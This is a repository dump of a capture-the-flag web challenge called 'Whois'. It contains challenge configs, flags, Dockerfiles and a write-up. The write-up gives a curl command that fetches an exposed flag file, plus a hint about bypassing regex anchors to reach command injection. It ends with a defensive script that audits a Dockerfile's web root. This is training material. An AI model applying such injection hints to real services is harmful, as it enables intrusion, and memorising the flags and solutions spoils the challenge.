  - shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}

hints:
  - "The source code of query.php is available in /query.php endpoint. \nRead about anchors in regex syntax in PHP, the goal is to send an input that can pass the regex but still can make an injection"

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/web/whois-fixed/challenge/index.html:
--------------------------------------------------------------------------------
Whois
Welcome to this web-based Whois service
--------------------------------------------------------------------------------
/web/whois-fixed/challenge/query.php:
--------------------------------------------------------------------------------
Whois
--------------------------------------------------------------------------------
/web/whois-fixed/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.8'

services:

  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - '1702:80'
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure
      resources:
        limits:
          cpus: '0.5'
          memory: 150M
    healthcheck:
      test: curl -I --fail http://localhost/ || exit 1
      interval: 60s
      timeout: 2s
      retries: 5

--------------------------------------------------------------------------------
/web/whois-fixed/flag.txt:
--------------------------------------------------------------------------------
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll_9837432986534065}
--------------------------------------------------------------------------------
/web/whois-fixed/solution/payload_test_capture.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/whois-fixed/solution/payload_test_capture.png
--------------------------------------------------------------------------------
/web/whois-fixed/solution/php_doc_capture.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/whois-fixed/solution/php_doc_capture.png
--------------------------------------------------------------------------------
/web/whois-fixed/solution/php_test_capture.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/web/whois-fixed/solution/php_test_capture.png
--------------------------------------------------------------------------------
/web/whois/Dockerfile:
--------------------------------------------------------------------------------
FROM php:7.3-apache

RUN apt-get update \
    && DEBIAN_FRONTEND=noninteractive apt-get -y --no-install-recommends install whois netbase

COPY challenge/ /var/www/html/

COPY flag.txt /var/www/html/

WORKDIR /var/www/html

RUN chown -R root:root /var/www/html
RUN chmod 444 flag.txt
--------------------------------------------------------------------------------
/web/whois/README.md:
--------------------------------------------------------------------------------
# Whois

**`Author:`** [souad](https://github.com/SouadSEBAA)

## Description

> A web-based Whois service.

## Solution

Solution of the challenge can be found [here](solution/).

--------------------------------------------------------------------------------
/web/whois/challenge.yml:
--------------------------------------------------------------------------------
name: "Whois"
author: "souad"
author_link: "https://github.com/SouadSEBAA"

category: web
difficulty: medium

description: |
  > A web-based Whois service

  **Author :** souad

connection_info: https://whois.challs.shellmates.club

tags:
  - medium

value: 500
type: dynamic

extra:
  initial: 500
  decay: 15
  minimum: 50

flags:
  - shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll}

hints:
  - "The source code of query.php is available in /query.php endpoint. \nRead about anchors in regex syntax in PHP, the goal is to send an input that can pass the regex but still can make an injection"

state: visible

version: "0.1"

--------------------------------------------------------------------------------
/web/whois/challenge/index.html:
--------------------------------------------------------------------------------
Whois
Welcome to this web-based Whois service
--------------------------------------------------------------------------------
/web/whois/challenge/query.php:
--------------------------------------------------------------------------------
Whois
--------------------------------------------------------------------------------
/web/whois/docker-compose.yml:
--------------------------------------------------------------------------------
version: '3.8'

services:

  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - '1702:80'
    deploy:
      replicas: 1
      restart_policy:
        condition: on-failure
      resources:
        limits:
          cpus: '0.5'
          memory: 150M
    healthcheck:
      test: curl -I --fail http://localhost/ || exit 1
      interval: 60s
      timeout: 2s
      retries: 5

--------------------------------------------------------------------------------
/web/whois/flag.txt:
--------------------------------------------------------------------------------
shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll}
--------------------------------------------------------------------------------
/web/whois/solution/README.md:
--------------------------------------------------------------------------------
# Whois

## Write-up

There was an unintended solution due to a mistake during the creation of the challenge where the flag was located in the webroot without any restrictions, so you can access it directly.

## Final payload
```bash
curl -v 'https://whois.challs.shellmates.club/flag.txt'
```

## Flag

`shellmates{i_$h0U1D_HaVE_R3AD_7HE_dOc_W3Ll}`

--------------------------------------------------------------------------------
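Added example (not part of the repository): a build-time audit for the condition the write-up above describes. It reads the COPY and WORKDIR lines of the two Whois Dockerfiles and lists every file that lands in the Apache document root without coming from the application directory. The function name, the `challenge/` default for the application directory and the `OUTSIDE` Dockerfile are assumptions made for illustration.

```python
import posixpath

DOCROOT = "/var/www/html"  # Apache document root in the php:7.3-apache image

# COPY/WORKDIR lines as they appear in the two Dockerfiles on this page.
WHOIS = """FROM php:7.3-apache
COPY challenge/ /var/www/html/
COPY flag.txt /var/www/html/
WORKDIR /var/www/html
"""
WHOIS_FIXED = """FROM php:7.3-apache
COPY challenge/ /var/www/html/
COPY flag.txt /var/www/html/thisistheflagwithrandomstuffthatyouwontguessJUSTCATME
WORKDIR /var/www/html
"""
# Constructed variant (assumption): the secret is kept outside the document root.
OUTSIDE = """FROM php:7.3-apache
COPY challenge/ /var/www/html/
COPY flag.txt /opt/whois/flag.txt
"""


def served_extras(dockerfile, app_src="challenge/", docroot=DOCROOT):
    """URL paths of files COPYed into docroot from anywhere but app_src.

    Handles shell-form COPY and WORKDIR only (no JSON form, ADD or
    multi-line COPY), which is enough for the Dockerfiles above.
    """
    workdir, exposed = "/", []
    for line in dockerfile.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        instr = parts[0].upper()
        if instr == "WORKDIR":
            # Relative COPY destinations resolve against the current WORKDIR.
            workdir = posixpath.normpath(posixpath.join(workdir, parts[1]))
        elif instr == "COPY":
            args = [p for p in parts[1:] if not p.startswith("--")]
            if len(args) < 2:
                continue
            *sources, dest = args
            into_dir = dest.endswith("/") or len(sources) > 1
            dest_abs = posixpath.normpath(posixpath.join(workdir, dest))
            for src in sources:
                if src.startswith(app_src):
                    continue  # application files are meant to be served
                target = posixpath.join(dest_abs, posixpath.basename(src)) if into_dir else dest_abs
                if target.startswith(docroot + "/"):
                    exposed.append("/" + posixpath.relpath(target, docroot))
    return exposed


if __name__ == "__main__":
    for name, text in [("whois", WHOIS), ("whois-fixed", WHOIS_FIXED), ("outside", OUTSIDE)]:
        print(name, served_extras(text) or "nothing extra in the document root")
```

Both the original and the fixed Dockerfile are reported, because renaming the file still leaves it inside the served directory; only the constructed variant passes.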